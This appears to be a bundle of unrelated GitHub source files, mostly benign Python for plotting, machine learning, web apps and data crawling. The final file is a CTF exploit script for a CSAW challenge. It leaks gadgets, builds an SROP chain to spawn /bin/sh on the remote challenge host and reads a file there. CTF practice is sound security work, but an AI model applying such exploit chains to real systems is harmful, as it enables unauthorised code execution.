import numpy as np import matplotlib.pyplot as plt import matplotlib.animation as animation import pandas as pd df = pd.read_csv("File.txt", sep=" ") #print(df) moviewriter = animation.FFMpegWriter( fps=60) fig = plt.figure(figsize=(12, 6)) with moviewriter.saving(fig, 'myfile.mp4', dpi=100): integration_time = 100 i = integration_time end = len(df.get("x")) while( i < end): ax = fig.add_subplot(121) ax2 = fig.add_subplot(122) ax.set_xlabel('X') ax.set_xlim([-0.02, 0.02]) ax.set_ylim([-0.02, 0.02]) ax.set_ylabel('Y') ax2.set_xlim([-0.02, 0.02]) ax2.set_xlabel('Z') ax2.set_ylim([-0.02, 0.02]) ax2.set_ylabel('Y') for j in range(i - integration_time, i): ax.plot(df.get("x")[j],df.get("y")[j], 'ko') ax2.plot(df.get("z")[j],df.get("y")[j], 'ko') print(j) moviewriter.grab_frame() i += 50 fig.clear() moviewriter.finish()
josephmckenna/2021_April_IOP_IntroductionToCpp_Part1
extras/AnimateFigure.py
AnimateFigure.py
py
1,004
python
en
code
6
github-code
36
19245162119
''' CS5001 Fall 2022 Elif Tirkes Homework 3: What color is that square? ''' from chessboard import check_valid_row from chessboard import check_valid_column def main(): test_squares() def test_column_validity(): ''' Function -- test_column_validity presents three string-only test cases for the function check_valid_column Parameters: N/A, calls for the check_valid_row and check_valid_column with set inputs Returns printed expected and actual results for the 3 tests for the check_valid_column function ''' col_test_1 = check_valid_column("v") col_test_2 = check_valid_column("Z") col_test_3 = check_valid_column("B") col_test_4 = check_valid_column("A") # Column Test 1 print(f"\n*****\nColumn v: Expected: False, Actual: {col_test_1}") # Column Test 2 print(f"Column Z: Expected: False, Actual: {col_test_2}") # Column Test 3 print(f"Column B: Expected: True, Actual: {col_test_3}") # Column Test 4 print(f"Column A: Expected: True, Actual: {col_test_4}\n*****\n") def test_row_validity(): ''' Function -- check_row_validity presents three string-only test cases for the function check_valid_row Parameters: N/A, calls for the check_valid_row with set inputs Returns printed expected and actual results for the 3 tests for the check_valid_row ''' row_test_1 = check_valid_row(8) row_test_2 = check_valid_row(10) row_test_3 = check_valid_row(999) row_test_4 = check_valid_row(1) # Row Test 1 print(f"\n*****\nRow 8: Expected: True, Actual: {row_test_1}") # Row Test 2 print(f"Row 10: Expected: False, Actual: {row_test_2}") # Row Test 3 print(f"Row 999: Expected: False, Actual: {row_test_3}") # Row Test 4 print(f"Row 1: Expected: True, Actual: {row_test_4}\n*****\n") def test_squares(): ''' Function -- test_squares calls test_row_validity() and test_column_validity() Returns results for test_row_validity() and test_column_validity() ''' test_row_validity() test_column_validity() if __name__ == "__main__": main()
skippyskiddy/Python-Projects
Pokemon & Chess - Loops & Conditionals/test_squares.py
test_squares.py
py
2,210
python
en
code
0
github-code
36
35681548851
import os import sys import cv2 import time import pickle import numpy as np import pandas as pd from sklearn.decomposition import PCA from sklearn.svm import SVC from sklearn.metrics import confusion_matrix,accuracy_score,f1_score def generate_pca_dataset(datapath): time1 = time.clock() folders = [ '00000001', '00000002', '00000003', '00000004', '00000005', '00000006', '00000007', '00000008', '00000009', '00000010', '00000011', '00000012', '00000013', '00000014', '00000015', '00000016', '00000017', '00000018', '00000019', '00000020', '00000021', '00000022', '00000023', '00000024', '00000025', '00000026', '00000027', '00000028', '00000029', '00000030', '00000031', '00000032', '00000033', '00000034', '00000035', '00000036', '00000037', '00000038', '00000039', '00000040', '00000041', '00000042', '00000043', '00000044', '00000045', '00000046', '00000047', '00000048', '00000049', '00000050'] gray_list = [] for folder in folders: all_files = os.listdir(datapath+"/"+folder+"/") png_files = [] for file in all_files: png_files.append(file) if ('.png' in file) else None for file in png_files: gray_list.append(np.float32(np.ravel(cv2.cvtColor(cv2.imread(datapath+"/"+folder+"/"+file)[32:196,11:153,:], cv2.COLOR_BGR2GRAY))/255.0)) del(all_files) del(png_files) a = np.array(gray_list) del(gray_list) del(folders) time2 = time.clock() print("Time taken to generate dataset for PCA -> " + str(time2-time1)) return a def pca_transform_folder_wise(datapath,my_pca): time1 = time.clock() folder_list = os.listdir(datapath+"/") counter = 0 for folder in folder_list: time2 = time.clock() print(folder) all_files = os.listdir(datapath+"/"+folder+"/") png_files = [] for file in all_files: png_files.append(file) if ('.png' in file) else None curr_data = [] for file in png_files: curr_data.append(my_pca.transform(np.float32(np.ravel(cv2.cvtColor(cv2.imread(datapath+"/"+folder+"/"+file)[32:196,11:153,:], cv2.COLOR_BGR2GRAY)).reshape(1,-1)/255.0)).tolist()) del(all_files) del(png_files) svm_train_x = open(datapath+"/"+folder+"/pca_normalized_transform_list",'ab') pickle.dump(curr_data,svm_train_x) svm_train_x.close() time3 = time.clock() print("Time taken to generate and store pickle = " + str(time3-time2)) time3 = time.clock() print("Time taken to generate all pickle files folder wise = " + str(time3-time1)) def synthesize_svm_data(datapath,my_pca,name,reward_avail): time1 = time.clock() folder_list = os.listdir(datapath+"/") if reward_avail==1: folder_list.remove("rewards.csv") reward_list = np.array(pd.read_csv(datapath + "/rewards.csv",header=None,dtype=int))[:,1].tolist() list_for_array = [] for folder in folder_list: all_files = os.listdir(datapath+"/"+folder+"/") png_files = [] curr_data = [] for file in all_files: png_files.append(file) if ('.png' in file) else None for file in png_files: curr_data.extend(my_pca.transform(np.float32(np.ravel(cv2.cvtColor(cv2.imread(datapath+"/"+folder+"/"+file)[32:196,11:153,:], cv2.COLOR_BGR2GRAY)).reshape(1,-1)/255.0).tolist())) list_for_array.append(curr_data) del(curr_data) del(all_files) del(png_files) time2 = time.clock() print("Time taken to generate list = " + str(time2-time1)) svm_val_x = open(name+"x",'ab') pickle.dump(list_for_array,svm_val_x) svm_val_x.close() time3 = time.clock() print("Time taken to generate pickle file for x = " + str(time3-time2)) if reward_avail==1: svm_val_y = open(name+"y",'ab') pickle.dump(reward_list,svm_val_y) svm_val_y.close() time4 = time.clock() print("Time taken to generate pickle file for y = " + str(time4-time3)) def get_train_data(datapath,num_folders): time1 = time.clock() train_x = [] train_y = [] folder_list = os.listdir(datapath+"/") for folder_idx in range(num_folders): folder = folder_list[folder_idx] time2 = time.clock() reward_array = np.array(pd.read_csv(datapath+"/"+folder+"/rew.csv",dtype=int)).tolist() pickle_file = open(datapath+"/"+folder+"/pca_normalized_transform_list",'rb') curr_data = pickle.load(pickle_file) pickle_file.close() del(pickle_file) for last_frame in range(6,len(curr_data)-3,1): frame_num_list = [x for x in range(last_frame-6,last_frame+1)] data = [] for frame_num in frame_num_list: data.append(curr_data[frame_num][0]) if reward_array[last_frame+1]==1: for drop1 in range(5): for drop2 in range(drop1+1,6): new_list = [y for y in [0,1,2,3,4,5,6] if y not in [drop1,drop2]] new_data = [] for idx in new_list: new_data.extend(data[idx]) train_x.append(new_data) train_y.append(reward_array[last_frame+1][0]) if last_frame%3==0: train_x.append(new_data) train_y.append(reward_array[last_frame+1][0]) del(new_list) del(new_data) else: count_max = folder_idx%2 for count in range(count_max): drop1 = 0 drop2 = 0 while drop1==drop2: drop1 = np.random.randint(6) drop2 = np.random.randint(6) new_list = [y for y in [0,1,2,3,4,5,6] if y not in [drop1,drop2]] new_data = [] for idx in new_list: new_data.extend(data[idx]) train_x.append(new_data) train_y.append(reward_array[last_frame+1][0]) del(new_list) del(new_data) del(data) del(frame_num) del(frame_num_list) time3 = time.clock() print("Time taken to generate data from "+folder+" -> "+str(time3-time2)) time2 = time.clock() print("Total time taken to generate train data -> " + str(time2-time1)) return train_x,train_y def get_test_data(val_or_test,reward_avail): path = "" val_x = [] if val_or_test==0: path = "./pca_val_normalized" else: path = "pca_test_normalized" # Loading the x file pickle_file = open(path+"x",'rb') data_dash = pickle.load(pickle_file) pickle_file.close() for i in range(len(data_dash)): curr_data = [] for j in range(5): curr_data.extend(data_dash[i][j]) val_x.append(curr_data) if val_or_test==1: return val_x else: pickle_file = open(path+"y",'rb') data_dash = pickle.load(pickle_file) pickle_file.close() return val_x,data_dash def main(): dataset = generate_pca_dataset("../train_dataset") pca_dataset_pickle_file = open("pca_dataset_pickle",'rb') dataset = pickle.load(pca_dataset_pickle_file) my_pca = PCA(n_components=50) my_pca.fit(dataset) del(dataset) pca_transform_folder_wise("../train_dataset",my_pca) synthesize_svm_data("../validation_dataset",my_pca,"pca_val_normalized",1) synthesize_svm_data("../test_dataset",my_pca,"pca_test_normalized",0) del(my_pca) time1 = time.clock() num_folders = 500 train_x,train_y = get_train_data("../train_dataset",num_folders) time2 = time.clock() print("Training data read in " + str(time2-time1)) val_x,val_y = get_test_data(0,1) test_x = get_test_data(1,0) penalty = 5 gamma = "auto" print("Val and test data read") time3 = time.clock() linear_svm = SVC(C=penalty,kernel='linear',max_iter=4000) linear_svm.fit(train_x,train_y) time4 = time.clock() print("Linear trained in " + str(time4-time3)) time5 = time.clock() gaussian_svm = SVC(C=penalty,kernel='rbf',gamma=gamma,max_iter=4000) gaussian_svm.fit(train_x,train_y) time6 = time.clock() print("Gaussian trained in " + str(time6-time5)) linear_svm_pickle = open("svm_linear_trained",'ab') pickle.dump(linear_svm,linear_svm_pickle) linear_svm_pickle.close() gaussian_svm_pickle = open("gaussian_svm_trained",'ab') pickle.dump(gaussian_svm,gaussian_svm_pickle) gaussian_svm_pickle.close() linear_svm_pickle = open("svm_linear_trained",'rb') linear_svm = pickle.load(linear_svm_pickle) linear_svm_pickle.close() gaussian_svm_pickle = open("gaussian_svm_trained",'rb') gaussian_svm = pickle.load(gaussian_svm_pickle) gaussian_svm_pickle.close() linear_pred_lbl = linear_svm.predict(train_x) print("Linear Model with penalty = " + str(penalty) + ": ") print("Train Accuracy -> " + str(accuracy_score(np.array(train_y),linear_pred_lbl))) print("Train F1_score -> " + str(f1_score(np.array(train_y),linear_pred_lbl,average="micro"))) print(confusion_matrix(np.array(train_y),linear_pred_lbl)) print(f1_score(np.array(train_y),linear_pred_lbl)) linear_pred_lbl = linear_svm.predict(val_x) print("Test Accuracy -> " + str(accuracy_score(np.array(val_y),linear_pred_lbl))) print("Test F1_score -> " + str(f1_score(np.array(val_y),linear_pred_lbl,average="micro"))) print(confusion_matrix(np.array(val_y),linear_pred_lbl)) print(f1_score(np.array(val_y),linear_pred_lbl)) # time5 = time.clock() gaussian_pred_lbl = gaussian_svm.predict(train_x) print("Gaussian Model with penalty = " + str(penalty) + " and gamma = " + str(gamma)) print("Train Accuracy -> " + str(accuracy_score(np.array(train_y),gaussian_pred_lbl))) print("Train F1_score -> " + str(f1_score(np.array(train_y),gaussian_pred_lbl,average="micro"))) print(confusion_matrix(np.array(train_y),gaussian_pred_lbl)) print(f1_score(np.array(train_y),gaussian_pred_lbl)) gaussian_pred_lbl = gaussian_svm.predict(val_x) print("Test Accuracy -> " + str(accuracy_score(np.array(val_y),gaussian_pred_lbl))) print("Test F1_score -> " + str(f1_score(np.array(val_y),gaussian_pred_lbl,average="micro"))) print(confusion_matrix(np.array(val_y),gaussian_pred_lbl)) print(f1_score(np.array(val_y),gaussian_pred_lbl)) columns = ["Prediction"] linear_test_pred = np.ravel(linear_svm.predict(test_x)).tolist() gaussian_test_pred = np.ravel(gaussian_svm.predict(test_x)).tolist() pd.DataFrame(np.array(linear_test_pred)).to_csv("linear_svm_prediction.csv",header=columns,index=True) pd.DataFrame(np.array(gaussian_test_pred)).to_csv("gaussian_svm_prediction.csv",header=columns,index=True) if __name__ == '__main__': main()
pradyumnameena/COL774-Machine-Learning
Assignment-4/pca.py
pca.py
py
9,783
python
en
code
0
github-code
36
38110745441
import os import shutil from pathlib import Path def checkPathExists(filePath): if not (os.path.exists(filePath)): errorMessage = f'File Path not found: {filePath}' print(errorMessage) raise FileNotFoundError(errorMessage) def recreateFolderPath(filepath): if not (os.path.exists(filepath)): print(f'Creating filepath: {filepath}') os.mkdir(filepath) else: print(f'Recreating filepath: {filepath}') shutil.rmtree(filepath) os.mkdir(filepath) def sortFilesByExtension(filePath): #moves files to subfolders based on their extension type #to make loading a bit easier print('Sorting files by extension type') fileExtensions = set() files = [] for file in os.listdir(filePath): if os.path.isfile(os.path.join(filePath, file)): files.append(file) fileExtensions.add(Path(file).suffix) #create/recreate empty subfolders for fileExtension in fileExtensions: fileExtensionFolderName = fileExtension.replace('.','') print(fileExtensionFolderName) recreateFolderPath(os.path.join(filePath, fileExtensionFolderName)) for file in files: fileExtensionFolderName = Path(file).suffix.replace('.','') oldFilePath = os.path.join(filePath, file) newFilePath = os.path.join(filePath, fileExtensionFolderName, file) print(f'Moving {oldFilePath} to {newFilePath}') shutil.move(oldFilePath, newFilePath)
ibaadaleem/filmDatabase
fileManagement.py
fileManagement.py
py
1,354
python
en
code
0
github-code
36
40165431906
# -*- encoding: utf-8 -*- from django import template from django.contrib import admin from django.conf import settings register = template.Library() ''' templatetag, obtiene la configuración del menú ''' def get_config_menu(): return Menu.get_menu(self) register.filter('get_config_menu') class Menu(object): menu_key = 'SOMBRA_MENU' def __init__(self): return None def get_default_menu(self): ''' Devuelve las opciones por defecto del menú ''' return { 'MENU': ( 'sites', {'label': 'Custom', 'icon':None, 'models': ( 'auth.group', {'model': 'auth.user', 'label': 'Staff'} )}, ), 'LIST_PER_PAGE': 20, } def get_menu(self, param=None): ''' Obtiene la configuración de settings.py Ex: get_menu() Ex: get_menu('MENU') return dicc ''' if hasattr(settings, menu_key): menu = getattr(settings, menu_key, {}) else: menu = get_default_menu() if param: menu_value = menu.get(param) return menu_value return menu
elmanos/vari
vari/localesapp/templatetags/menu.py
menu.py
py
1,276
python
es
code
0
github-code
36
13123666146
#!/usr/bin/env python # coding: utf-8 # # Finding appropriate parametric models # - Code from: https://lifelines.readthedocs.io/en/latest/Examples.html # In[1]: # Imports from lifelines import * from lifelines.plotting import qq_plot import numpy as np import matplotlib.pyplot as plt import pandas as pd import seaborn as sns # ## OxyTarget # In[2]: response = pd.read_csv('/Users/mikkorekstad/Skole/master_data/prepared_data/oxytarget/oxytarget_RO_response.csv', index_col='ID') # Target columns time = 'Time until OS event' event = 'OS event' T = response[time] E = response[event] # In[3]: from lifelines.utils import find_best_parametric_model best_model, best_aic_ = find_best_parametric_model(event_times=T, event_observed=E, scoring_method="AIC") # In[4]: best_model # In[5]: best_aic_ # In[6]: response.describe() # In[7]: plt.clf() sns.set_style('white') sns.set_context("paper", font_scale = 2) sns.displot(data=response, x=time, kind="hist", bins = 25, aspect = 1.5, hue=event, multiple="stack") plt.show() # In[8]: plt.clf() kmf = KaplanMeierFitter() kmf.fit(T, event_observed=E) kmf.survival_function_.plot() plt.grid() plt.title('Kaplan Meier Estimate OxyTarget') plt.show() # In[9]: plt.clf() fig, axes = plt.subplots(2, 2, figsize=(8, 6)) axes = axes.reshape(4,) models = [WeibullFitter(), LogNormalFitter(), LogLogisticFitter(), ExponentialFitter()] model_names = ['Weibull', 'LogNormal', 'LogLogistic', 'Exponential'] oxy_dict = {} for i, model in enumerate(models): model.fit(T, E) qq_plot(model, ax=axes[i], grid=True) axes[i].grid() print(f'{model_names[i]}: Log Likelihood [{model.log_likelihood_:.1f}], AIC [{model.AIC_:.1f}]') oxy_dict[model_names[i]] = f'{model.AIC_:.1f}' fig.suptitle('OxyTarget QQ-Plots', fontsize=16) plt.tight_layout() plt.show() # ### Discussion # - QQ-plot suggests that lognormal is the best fitting parametric distribution. # - This is supported by LogNormal: Log Likelihood [-313.676], AIC [631.352] # - AIC lower is better # - Log Likelihood higher is better # ## Head Neck # In[10]: response = pd.read_csv('/Users/mikkorekstad/Skole/master_data/prepared_data/headneck/response.csv', index_col='ID') # Target columns time = 'OS' event = 'event_OS' T = response[time] E = response[event] # In[11]: response.describe() # In[12]: plt.clf() sns.set_style('white') sns.set_context("paper", font_scale = 2) sns.displot(data=response, x=time, kind="hist", bins = 25, aspect = 1.5, hue=event, multiple="stack") plt.show() # In[13]: plt.clf() kmf = KaplanMeierFitter() kmf.fit(T, event_observed=E) kmf.survival_function_.plot() plt.grid() plt.title('Kaplan Meier Estimate Head Neck') plt.show() # kmf.cumulative_density_.plot() # In[14]: type(models[i]) # In[15]: plt.clf() fig, axes = plt.subplots(2, 2, figsize=(8, 6)) #plt.title() axes = axes.reshape(4,) models = [WeibullFitter(), LogNormalFitter(), LogLogisticFitter(), ExponentialFitter()] model_names = ['Weibull', 'LogNormal', 'LogLogistic', 'Exponential'] hnc_dict = {} for i, model in enumerate(models): model.fit(T, E) qq_plot(model, ax=axes[i], grid=True) axes[i].grid() print(f'{model_names[i]}: Log Likelihood [{model.log_likelihood_:.3f}], AIC [{model.AIC_:.3f}]') hnc_dict[model_names[i]] = f'{model.AIC_:.1f}' fig.suptitle('Head Neck QQ-Plots', fontsize=16) plt.tight_layout() plt.show() # ### Discussion # - QQ-plot suggests that lognormal is the best fitting parametric distribution. # - This is supported by LogNormal: LogNormal: Log Likelihood [-443.258], AIC [890.516] # - AIC lower is better # - Log Likelihood higher is better # In[16]: pd.DataFrame.from_records([oxy_dict, hnc_dict], index=['OxyTarget', 'HeadNeck']) # In[ ]:
mikkorekstad/M30-DV
Module C (Model Appropriateness)/Response Distributions.py
Response Distributions.py
py
3,895
python
en
code
0
github-code
36
23297154753
""" Series Meta Analysis. Some day this will be either the parent class of TAM and Adoption, or at least used by them. For now, needed to have the general class for use in integrations where it is sometimes used in unique ways. Note, at this time, this class does *not* handle the interpolation, fitting, etc; we will need that eventually. """ from __future__ import annotations from pathlib import Path import pandas as pd import json from model import dd from dataclasses import dataclass from typing import Dict # I started from solution_xls_extract.extract_source_data, but kept finding that there # were inappropriate assumptions or requirements built in.... so I've ended up basically rewriting it. class SMA: @dataclass class Source: title: str shortname: str filename: str = None description: str = None data: pd.DataFrame = None # TODO: add some optional metadata: # The date this Source object was originally created # The parameters used to interpolate/extrapolate it at that time. # Original units and the conversion operation performed def short_form(self): # create a json-able struct that skips the dataframe struct = { 'title': self.title, 'shortname': self.shortname, 'filename': self.filename } if self.description: struct['description'] = self.description return struct # The main state of the SMA: region_cases and sources: region_cases : Dict[str,Dict[str,str]] = None """Structure mapping regions to cases to source-shortnames""" sources: Dict[str, Source] = None """Map of shortnames to source data""" # TODO: Add optional metadata: # Title # Units # Description # Version, date or something? def __init__(self, region_cases=None, sources=None): self.region_cases = region_cases or {} self.sources = sources or {} def rename_region(self,oldname,newname): """Rename one of the regions across both the region_cases and source data columns. Typically used to give standardized names to the top-level block(s)""" self.region_cases[newname] = self.region_cases[oldname] del self.region_cases[oldname] for source in self.sources.values(): source.data.rename(columns={oldname: newname}, inplace=True) def summary(self, region=None, case=None, summary=None) -> pd.DataFrame: """Return a df summarizing the data in this SMA. If region is specified, the DataFrame only includes that region, otherwise it includes all regions. If case is specified, only sources in that case are used (and values may be nan if there are no corresponding sources). Alternatively, case may be a shortname of a single source, which is returned instead. ...Currently, only lookup of a single source name is supported.""" # Eventually we want this to support the mean/hi/lo features and various interpolation and fit options. # Eventually we will allow for the optional configuration of a default summary type, that accomplishes what the tamconfig, etc. does if case in self.sources.keys(): if region: return self.sources[case].data[[region]] else: return self.sources[case].data else: raise NotImplemented @staticmethod def read(directory, base_name, read_data=True) -> SMA: directory = Path(directory) jsonfile = directory / f"{base_name}.json" jsondat = json.loads(jsonfile.read_text(encoding='utf-8')) sources = {} for source_info in jsondat['sources']: smax = SMA.Source(**source_info) if read_data: smax.data = pd.read_csv( directory / source_info['filename'], index_col="Year", skipinitialspace=True, skip_blank_lines=True, comment='#', encoding='utf-8') sources[source_info['shortname']] = smax return SMA(jsondat['region_cases'], sources) def write(self, directory, base_name): """ Write to directory. Written as a set of csv files, one per data source, and a json file for the top_level hierarchy. """ directory = Path(directory) directory.mkdir(exist_ok=True) for source in self.sources.values(): # even if we had a filename before, we update it with the current base source.filename = f"{base_name}_{source.shortname}.csv" outputfile = directory / source.filename source.data.to_csv(outputfile, encoding='utf-8') # for the top-level structure, create a json-dumpable dict jdd = { 'region_cases' : self.region_cases, 'sources': [ v.short_form() for v in self.sources.values() ] } toplevelfile = directory / f"{base_name}.json" toplevelfile.write_text(json.dumps(jdd, indent=2), encoding='utf-8') def as_tamsources(self, directory): """Translate the region_cases structure into the format expected by model.tam.TAM and model.adoptiondata.AdoptionData. There are three changes: 1) The region names get prefixed with 'Region: '. We only do this for regions in dd.REGIONS 2) The first top-level region has the outer level of the hierarchy removed, so you get this weird mixed-level thing that looks like this: { 'Baseline Cases': { ... }, 'Conservative Cases': { ... }, 'Ambitious Cases': { ... }, 'Region: OECD90': { 'Baseline Cases': { ... }, 'Conservative Cases': { ... }, 'Ambitious Cases': { ... } }, ... 3) Instead of having a shortname, embed the title and full file reference directly in the sources data structure """ directory = Path(directory) # Do the 2nd and 3rd substitions first sources = {} for region in self.region_cases.keys(): cases = {} for case in self.region_cases[region].keys(): cases[case] = { self.sources[sn].title : directory/self.sources[sn].filename for sn in self.region_cases[region][case] } if region in dd.REGIONS[1:]: region = "Region: " + region sources[region] = cases # Do the 1st substitution: disinter the first region. # To keep the dictionary ordering correct, we actually copy stuff over again. firstregion = list(self.region_cases.keys())[0] sources2 = sources[firstregion] del(sources[firstregion]) sources2.update(sources) return sources2
ProjectDrawdown/solutions
limbo/sma.py
sma.py
py
6,839
python
en
code
203
github-code
36
24951711823
from flask import render_template, request, redirect from app import app from models.book import * from models.book_list import book_list, add_new_book, delete_book @app.route('/') def index(): return render_template('index.html', book_list = book_list) @app.route('/stock') def display_stock(): return render_template('display_books.html', book_list = book_list) @app.route('/stock/<display_stock>') def book_detail(display_stock): chosen_book = book_list [int(display_stock)] return render_template ('single_book.html', book = chosen_book, book_list = book_list) @app.route('/stock/add') def new_book(): return render_template('add_book.html') @app.route('/stock', methods=['POST']) def add_book(): title = request.form['title'] author = request.form['author'] genre = request.form['genre'] description = request.form['description'] if request.form.get('available'): availability = True else: availability = False new_book = Book (title, author, genre, description, availability) add_new_book(new_book) return redirect("/stock") @app.route('/stock/delete/', methods =['POST']) def delete(): index_to_delete = int(request.form["delete"]) delete_book(index_to_delete) return redirect("/stock")
sshingler/Flask-library_homework
controllers/controller.py
controller.py
py
1,287
python
en
code
0
github-code
36
30071209692
# -*- coding: utf-8 -*- """ This code is open-sourced software licensed under the MIT license""" """ Copyright 2019 Marta Cortes, UbiComp - University of Oulu""" """ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ """ DISCLAIMER This code is used to crawl/parse data from several files from Antalya. By downloading this code, you agree to contact the corresponding data provider and verify you are allowed to use (including, but not limited, crawl/parse/download/store/process) all data obtained from the data source. """ """ Parse excel files into correct format in csv files. """ """ """ """ Data are stored in an excel file named antalya_cutler_all_data_ (version 1).xlsx in different sheets """ """ Sheets names: - TRANSPORT_VML55A, TRANSPORT_VC56, TRANSPORT_KC35, TRANSPORT_KC35A, TRANSPORT_CV17A, TRANSPORT_MZ78, TRANSPORT_MK80, TRANSPORT_MK80A, TRANSPORT_VF66 """ """ Original files must be previously saved in folder temp""" """ """ """ code: ant_env_cityofant_gwl """ import os import pandas as pd import shutil import uuid from kafka import KafkaProducer from kafka.errors import KafkaError import logging __author__ = "Marta Cortes" __mail__ = "marta.cortes@oulu.fi" __origin__ = "UbiComp - University of Oulu" logging.basicConfig(level=logging.INFO) code= 'anta_eco_citiofantalya_cityzonepuplictransportationpasengernumber_monthly' l_temp_path = './temp/' l_final_path = './data/' data_sheets = ['TRANSPORT_VML55A', 'TRANSPORT_VC56', 'TRANSPORT_KC35', 'TRANSPORT_KC35A', 'TRANSPORT_CV17A', 'TRANSPORT_MZ78','TRANSPORT_MK80', 'TRANSPORT_MK80A', 'TRANSPORT_VF66'] xlfname = 'antalya_cutler_all_data_ (version 1).xlsx' class anta_eco_cityzonepuplictransportationpasengernumber_monthly(object): def _init_(self): self.local = True def parse_file(self): fileName = l_temp_path+xlfname# xl = pd.ExcelFile(fileName) print ('opening file '+fileName) df_final = pd.DataFrame() for data_sheetn in data_sheets: #data into dataframe df_data = xl.parse (data_sheetn, header =1) print(len(df_data.columns)) print(len(df_data)) #remove index columns df_data.reset_index(inplace = True) #remove the last row df_data.drop(df_data.tail(2).index,inplace=True) #add reference to sheet name df_data['CODE'] = data_sheetn #First cleaning of sensor data column names #df_data.columns = df_data.columns.str.replace(r"\(.*\)","")#remove all braces and data inside #print (df_data.columns.tolist) df_data_clean = df_data[['DATE', 'CODE','ZONE NAME', 'NUMBER OF TOUR ', 'FREE1', 'FREE2', 'FREE3', 'TICKET', 'STUDENT', 'PERSON', 'KREDI KART PERSON ', 'TEACHER','RETRIED', 'S.KART INDIRIMLI', 'AIRPORT EMPLOYER', 'TAX AUDIT CARD','TOTAL SUM']].copy() #print (df_data_clean.count) print(len(df_data_clean.columns)) print(len(df_data_clean)) #print (df_data_clean.columns.tolist) df_final = df_final.append(df_data_clean) print(len(df_final.columns)) print(len(df_final)) #print (df_final.count) #Any date to reformat? df_final['DATE'] = pd.to_datetime(df_final['DATE'], format='%d/%m/%Y').dt.strftime('%Y-%m-%d') #RENAME COLUMNS df_final.rename(columns={'DATE':'Date', 'CODE':'Code','ZONE NAME':'Zone Name', 'NUMBER OF TOUR ':'number_or_tour', 'FREE1':'free1', 'FREE2':'free2', 'FREE3':'free3', 'TICKET':'ticket', 'STUDENT':'student', 'PERSON':'person', 'KREDI KART PERSON ':'credit_card_person', 'TEACHER':'teacher','RETRIED':'retired', 'S.KART INDIRIMLI':'s_discount_card', 'AIRPORT EMPLOYER':'airport_employee', 'TAX AUDIT CARD':'tax_audir_card','TOTAL SUM':'total_sum'},inplace=True) #save outerdir = l_final_path if not os.path.exists(outerdir): os.mkdir(outerdir) outdir = outerdir+'/'+code if not os.path.exists(outdir): os.mkdir(outdir) csvfile = str(uuid.uuid4()) + ".csv"#sheet+'.csv' print ('writing to folder '+code) fullname = os.path.join(outdir, csvfile) df_final.to_csv(fullname, mode='w', encoding='utf-8-sig', index=False) def producer(self): """ This function sends data to kafka bus""" producer = KafkaProducer(bootstrap_servers=['HOST_IP'], api_version=(2, 2, 1)) topic = "ANTALYA_ECON_CITYOFANTALYA_CITYZONEPUPLICTRANSPORTATIONPASENGERNUMBER_MONTHLY_DATA_INGESTION" producer.send(topic, b'City zone data for antalya ingested to HDFS').get(timeout=30) if __name__ == '__main__': a = anta_eco_cityzonepuplictransportationpasengernumber_monthly() a.parse_file() a.producer()
CUTLER-H2020/DataCrawlers
Economic/antalya_econ_cityofantalya_cityzonepuplictransportationpasengernumber_monthly.py
antalya_econ_cityofantalya_cityzonepuplictransportationpasengernumber_monthly.py
py
5,426
python
en
code
3
github-code
36
36728615207
from pwn import * from time import sleep port = 11021 pw= '13462b403d91edd8c8389517c1eca3ed' for i in range(1,40): print(pw) sleep(2) context.arch='amd64' #p = process('./lol2.bin') p = remote("auto-pwn.chal.csaw.io", port) #pid = gdb.attach(p, gdbscript=""" # b * runChallenge # """) p.sendlineafter('> ',pw) #sleep(1) #tle zacne pljuvat binary start_address = '00001270' end_address = '00001300' main_address = '\nMain is at ' p.recvuntil(start_address) data = p.recvuntil(end_address) parsed_data = [] lines = data.split('\n') for line in lines: spline = line.split(' ') parsed_data.append(''.join(spline[1:9])) data_string= ''.join(parsed_data) #iskanje opcodeov opcodes = { "mov": "b80f000000c3905dc3", "ptr": "488902c3905dc3", "sys": "0f05c3905dc3", "rax": "58c3905dc3", "rdx": "5ac3905dc3" } offset_dict = {} sandudin = 0x1421 for mnem, code in opcodes.items(): offset = data_string.find(code) if offset == -1: print("Did not find mnemonic " + mnem) else: #sandi measure offset_dict[mnem] = sandudin -(offset//2 + int(start_address, 16)) print("E SI MI DOBAR: ",mnem,hex(offset_dict[mnem])) #should work? p.recvuntil(main_address) main = int(p.recvline().replace('\n',''),16) bss = main + 0x2c1f loop1 = main - offset_dict["mov"] loop2 = main - offset_dict["ptr"] loop3 = main - offset_dict["sys"] loop4 = main - offset_dict["rax"] loop5 = main - offset_dict["rdx"] padd= 'A' *9 bin_sh =p64(0x0068732f6e69622f) payload1 = padd payload1 += p64(loop4) payload1 += bin_sh payload1 += p64(loop5) payload1 += p64(bss) payload1 += p64(loop2) payload1 += p64(loop1) payload1 += p64(loop3) frame = SigreturnFrame() frame.rax = 0x3b frame.rdi = bss frame.rsi = 0x0 frame.rdx = 0x0 frame.rsp = 0x4141414141 frame.rip = loop3 payload1 += str(frame) p.sendline(payload1) p.sendline('cat message.txt') p.interactive() pw = raw_input('povej mi nekaj lepega: ') port+=1 p.shutdown() p.close() p.interactive()
Aleks-dotcom/ctf_lib_2021
csaw_finals/pwn/crafty/parser.py
parser.py
py
2,317
python
en
code
1
github-code
36
36819222640
